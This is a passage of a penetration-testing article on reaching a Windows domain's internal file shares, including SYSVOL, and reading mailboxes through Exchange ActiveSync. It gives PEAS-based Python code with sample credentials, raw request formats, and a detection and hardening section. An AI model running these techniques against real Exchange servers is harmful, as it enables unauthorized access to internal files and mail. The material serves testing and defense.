= re.compile(r\"\u003Cemail:from>(.*?)\u003C\u002Femail:from>\")\u003Cbr>    data = pattern_data.findall(email)\u003Cbr>    print(\"From:\"+data[0])\u003Cbr>    pattern_data = re.compile(r\"\u003Cemail:subject>(.*?)\u003C\u002Femail:subject>\")\u003Cbr>    data = pattern_data.findall(email)\u003Cbr>    print(\"Subject:\"+data[0])\u003Cbr>    pattern_data = re.compile(r\"\u003Cemail:datereceived>(.*?)\u003C\u002Femail:datereceived>\")\u003Cbr>    data = pattern_data.findall(email)\u003Cbr>    print(\"DateReceived:\"+data[0])\u003Cbr>    pattern_data = re.compile(r\"\u003Cemail:displayto>(.*?)\u003C\u002Femail:displayto>\")\u003Cbr>    data = pattern_data.findall(email)\u003Cbr>    print(\"DisplayTo:\"+data[0])\u003Cbr>    pattern_data = re.compile(r\"\u003Cemail:threadtopic>(.*?)\u003C\u002Femail:threadtopic>\")\u003Cbr>    data = pattern_data.findall(email)\u003Cbr>    print(\"ThreadTopic:\"+data[0])\u003Cbr>    pattern_data = re.compile(r\"\u003Cemail:importance>(.*?)\u003C\u002Femail:importance>\")\u003Cbr>    data = pattern_data.findall(email)\u003Cbr>    print(\"Importance:\"+data[0])\u003Cbr>    pattern_data = re.compile(r\"\u003Cemail:read>(.*?)\u003C\u002Femail:read>\")\u003Cbr>    data = pattern_data.findall(email)\u003Cbr>    print(\"Read:\"+data[0])\u003Cbr>    pattern_data = re.compile(r\"\u003Cairsyncbase:displayname>(.*?)\u003C\u002Fairsyncbase:displayname>\")\u003Cbr>    \u003Cbr>    data = pattern_data.findall(email)\u003Cbr>    for name in data :\u003Cbr>        print(\"Attachment:\"+name)\u003Cbr>  \u003Cbr>    pattern_data = re.compile(r\"\u003Cemail2:conversationindex>(.*?)\u003C\u002Femail2:conversationindex>\")\u003Cbr>    data = pattern_data.findall(email)\u003Cbr>    print(\"ConversationIndex:\"+data[0])\u003Cbr>\u003Cbr>    index1 = email.find('')\u003Cbr>    index2 = email.find('')\u003Cbr>    filename = data[0] + \".html\"\u003Cbr>    print('[+] Save body to %s'%(filename))\u003Cbr>    with open(filename, 'w+') as file_object:\u003Cbr>            file_object.write(email[index1:index2+7]) \u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>It should be noted that the returned email content has the body part in HTML format. My code extracts the body section and saves it as an HTML file, using the unique ConversationIndex as the filename.\u003C\u002Fp>\u003Cp>To obtain information from the sent mail folder, modifications need to be made to py_activesync_helper.py. For details on the changes, refer to https:\u002F\u002Fgithub.com\u002Fsolbirn\u002FpyActiveSync\u002Fblob\u002Fmaster\u002FpyActiveSync\u002Fdev_playground.py#L150\u003C\u002Fp>\u003Cp>(3) Accessing file shares\u003C\u002Fp>\u003Cp>Code example for listing shared files:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>import peas\u003Cbr># Create an instance of the PEAS client.\u003Cbr>client = peas.Peas()\u003Cbr># Disable certificate verification so self-signed certificates don't cause errors.\u003Cbr>client.disable_certificate_verification()\u003Cbr># Set the credentials and server to connect to.\u003Cbr>client.set_creds({\u003Cbr>    'server': '192.168.1.1',\u003Cbr>    'user': 'test1',\u003Cbr>    'password': '123456789',\u003Cbr>})\u003Cbr># Retrieve a file share directory listing.\u003Cbr>listing = client.get_unc_listing(r'\\\\dc1\\SYSVOL')\u003Cbr>for data in listing :\u003Cbr>   print(\"\\r\\n\")\u003Cbr>   for key,value in data.items():\u003Cbr>      print('{key}:{value}'.format(key = key, value = value))\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Code example for reading the content of a specified shared file:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>import peas\u003Cbr># Create an instance of the PEAS client.\u003Cbr>client = peas.Peas()\u003Cbr># Disable certificate verification so self-signed certificates don't cause errors.\u003Cbr>client.disable_certificate_verification()\u003Cbr># Set the credentials and server to connect to.\u003Cbr>client.set_creds({\u003Cbr>    'server': '192.168.1.1',\u003Cbr>    'user': 'test1',\u003Cbr>    'password': '123456789',\u003Cbr>})\u003Cbr>\u003Cbr>data=client.get_unc_file(r'\\\\\\\\dc1\\\\SYSVOL\\\\test.com\\\\Policies\\\\{6AC1786C-016F-11D2-945F-00C04fB984F9}\\\\GPT.INI')\u003Cbr>print(data)\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Ch2>0x05 Details of accessing internal file shares via Exchange ActiveSync\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Ch3>1. List shared files\u003C\u002Fh3>\u003Cp>Example of accessed URL:\u003C\u002Fp>\u003Cp>https:\u002F\u002F192.168.1.1\u002FMicrosoft-Server-ActiveSync?Cmd=Search&amp;User=test1&amp;DeviceId=123456&amp;DeviceType=Python\"\u003C\u002Fp>\u003Cp>Parameter descriptions are as follows:\u003C\u002Fp>\u003Cul>\u003Cli>Cmd=Search indicates the command type is Search\u003C\u002Fli>\u003Cli>User=test1 indicates the username is test1\u003C\u002Fli>\u003Cli>DeviceId=123456 indicates the device ID, which will be recorded by Exchange ActiveSync\u003C\u002Fli>\u003Cli>DeviceType=Python indicates the device type, which will be recorded by Exchange ActiveSync\u003C\u002Fli>\u003C\u002Ful>\u003Cp>The method is a POST request\u003C\u002Fp>\u003Cp>Example of header content:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>\"Content-Type\": \"application\u002Fvnd.ms-sync.wbxml\",\u003Cbr>\"User-Agent\" : ,\u003Cbr>\"MS-ASProtocolVersion\" : \"14.1\",\u003Cbr>\"Accept-Language\" : \"en_us\",\u003Cbr>\"Authorization: Basic dXNlcjElM0FwYXNzd29yZDE=\"\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Example of body content:\u003C\u002Fp>\u003Cp>Need to convert XML format to WAP Binary XML (WBXML)\u003C\u002Fp>\u003Cp>XML format example:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp> \u003C!--?xml version=\"1.0\" encoding=\"utf-8\"?-->\u003Cbr> \u003C\u002Fp>\u003Csearch xmlns=\"Search:\" xmlns:documentlibrary=\"DocumentLibrary:\">\u003Cbr>   \u003Cstore>\u003Cbr>     \u003Cname>DocumentLibrary\u003C\u002Fname>\u003Cbr>     \u003Cquery>\u003Cbr>       \u003Cequalto>\u003Cbr>         \u003Cdocumentlibrary:linkid>\u003Cbr>         \u003Cvalue>\\\\myserver\\myshare\u003C\u002Fvalue>\u003Cbr>       \u003C\u002Fdocumentlibrary:linkid>\u003C\u002Fequalto>\u003Cbr>     \u003C\u002Fquery>\u003Cbr>     \u003Coptions>\u003Cbr>       \u003Crange>0-999\u003C\u002Frange>\u003Cbr>     \u003C\u002Foptions>\u003Cbr>   \u003C\u002Fstore>\u003Cbr> \u003C\u002Fsearch>\u003Cp>\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>XML format reference:\u003C\u002Fp>\u003Cp>https:\u002F\u002Fdocs.microsoft.com\u002Fen-us\u002Fopenspecs\u002Fexchange_server_protocols\u002Fms-asdoc\u002Ff8a23578-0ca4-4b36-aa07-3dcac5b83881\u003C\u002Fp>\u003Cp>WAP Binary XML (WBXML) algorithm reference:\u003C\u002Fp>\u003Cp>https:\u002F\u002Fdocs.microsoft.com\u002Fen-us\u002Fopenspecs\u002Fexchange_server_protocols\u002Fms-aswbxml\u002F39973eb1-1e40-4eb5-ac74-42781c5a33bc\u003C\u002Fp>\u003Ch3>2. Read the content of a specified shared file\u003C\u002Fh3>\u003Cp>Example URL for access: https:\u002F\u002F192.168.1.1\u002FMicrosoft-Server-ActiveSync?Cmd=ItemOperations&amp;User=test1&amp;DeviceId=123456&amp;DeviceType=Python\"\u003C\u002Fp>\u003Cp>Parameter descriptions are as follows:\u003C\u002Fp>\u003Cul>\u003Cli>Cmd=ItemOperations, indicating the command type is ItemOperations\u003C\u002Fli>\u003Cli>User=test1, indicating the username is test1\u003C\u002Fli>\u003Cli>DeviceId=123456, indicating the device ID, which will be recorded by Exchange ActiveSync\u003C\u002Fli>\u003Cli>DeviceType=Python, indicating the device type, which will be recorded by Exchange ActiveSync\u003C\u002Fli>\u003C\u002Ful>\u003Cp>The method is a POST request\u003C\u002Fp>\u003Cp>Header content example:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>\"Content-Type\": \"application\u002Fvnd.ms-sync.wbxml\",\u003Cbr>\"User-Agent\" : ,\u003Cbr>\"MS-ASProtocolVersion\" : \"14.1\",\u003Cbr>\"Accept-Language\" : \"en_us\",\u003Cbr>\"Authorization: Basic dXNlcjElM0FwYXNzd29yZDE=\"\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Body content example:\u003C\u002Fp>\u003Cp>Need to convert XML format to WAP Binary XML (WBXML)\u003C\u002Fp>\u003Cp>XML format example:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>\u003C!--?xml version=\"1.0\" encoding=\"utf-8\"?-->\u003Cbr> \u003Citemoperations xmlns:documentlibrary=\"DocumentLibrary:\" xmlns=\"ItemOperations:\">\u003Cbr>   \u003Cfetch>\u003Cbr>       \u003Cstore>DocumentLibrary\u003C\u002Fstore>\u003Cbr>       \u003Cdocumentlibrary:linkid>\\\\EXCH-D-810\\DocumentShare\\Word Document.docx\u003C\u002Fdocumentlibrary:linkid>\u003Cbr>   \u003C\u002Ffetch>\u003Cbr> \u003C\u002Fitemoperations>\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>XML format reference:\u003C\u002Fp>\u003Cp>https:\u002F\u002Fdocs.microsoft.com\u002Fen-us\u002Fopenspecs\u002Fexchange_server_protocols\u002Fms-asdoc\u002Fe7a91040-42f1-475c-bac3-d83d7dd9652f\u003C\u002Fp>\u003Cp>Based on the peas code, I extracted the shared file access functionality and created a portable version. The address is as follows:\u003C\u002Fp>\u003Cp>An open-source project\u003C\u002Fp>\u003Cp>The code supports two functions:\u003C\u002Fp>\u003Col>\u003Cli>List shared files\u003C\u002Fli>\u003Cli>Read the content of a specified shared file\u003C\u002Fli>\u003C\u002Fol>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>When accessing the domain shared directory SYSVOL, the path must include the domain controller's computer name, not the domain name\u003C\u002Fp>\u003Cp>Correct format:\u003C\u002Fp>\u003Cp>\\\\dc1\\SYSVOL\\test.com\\Policies\\{6AC1786C-016F-11D2-945F-00C04fB984F9}\\GPT.INI\u003C\u002Fp>\u003Cp>Incorrect format:\u003C\u002Fp>\u003Cp>\\\\test.com\\SYSVOL\\test.com\\Policies\\{6AC1786C-016F-11D2-945F-00C04fB984F9}\\GPT.INI\u003C\u002Fp>\u003Cp>If you have the domain controller's computer name, you can access files in the domain shared directory SYSVOL from the external network via Exchange ActiveSync\u003C\u002Fp>\u003Ch2>0x06 Defense Detection\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>Reading emails and accessing shared directories via Exchange ActiveSync leaves device information. Code location for device information:\u003C\u002Fp>\u003Cp>https:\u002F\u002Fgithub.com\u002FFSecureLABS\u002Fpeas\u002Fblob\u002Fmaster\u002Fpeas\u002FpyActiveSync\u002Fobjects\u002FMSASHTTP.py#L25\u003C\u002Fp>\u003Cp>Two methods to view device information\u003C\u002Fp>\u003Cp>1. Log in to Exchange Admin Center\u003C\u002Fp>\u003Cp>Select mailbox user -&gt; View details under Mobile Devices, as shown below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770017975828_2_46cc3e7356-1.jpeg\">\u003C\u002Fp>\u003Cp>2. Use Exchange Management Shell\u003C\u002Fp>\u003Cp>Command as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>Get-ActiveSyncDevice|fl UserDisplayName,DeviceId,DeviceType,DeviceUserAgent\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Log location for accessing shared files via Exchange ActiveSync:\u003C\u002Fp>\u003Cp>%ExchangeInstallPath%Logging\\HttpProxy\\Eas\u003C\u002Fp>\u003Cp>Method to disable accessing shared files via Exchange ActiveSync:\u003C\u002Fp>\u003Cp>Use Exchange Management Shell, command as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>Set-MobileDeviceMailboxPolicy -Identity:Default -UNCAccessEnabled:$false -WSSAccessEnabled:$false\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>References:\u003C\u002Fp>\u003Cp>https:\u002F\u002Fdocs.microsoft.com\u002Fen-us\u002Fpowershell\u002Fmodule\u002Fexchange\u002Fset-mobiledevicemailboxpolicy?view=exchange-ps\u003C\u002Fp>\u003Cp>Command to view configuration: Get-MobileDeviceMailboxPolicy |fl\u003C\u002Fp>\u003Ch2>0x07 Summary\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>This article details accessing internal file shares via Exchange ActiveSync, extracts the file-sharing access functionality based on peas code, generates a portable version, and provides defense recommendations along with exploitation approaches.\u003C\u002Fp>\u003C\u002Fbody>\u003C\u002Fhtml>",1004,"Onedaysec",6,"published","2026-02-02T07:51:00.061Z",{"title":37,"description":14,"keywords":38,"ogImage":39,"canonicalUrl":39,"noIndex":40},"Access Internal File Shares via Exchange ActiveSync Penetration","Exchange ActiveSync, penetration testing, internal file shares, EAS security, Microsoft Exchange, authentication bypass, file share access, ActiveSync exploit, cybersecurity, email server security",null,false,[],{"docs":43,"hasNextPage":40},[44,45,4,46],563,562,560,{"title":39,"description":39,"image":39},"2026-07-24T15:37:12.728Z","2026-07-23T16:01:44.863Z","draft","2026-07-23T16:13:21.631Z"]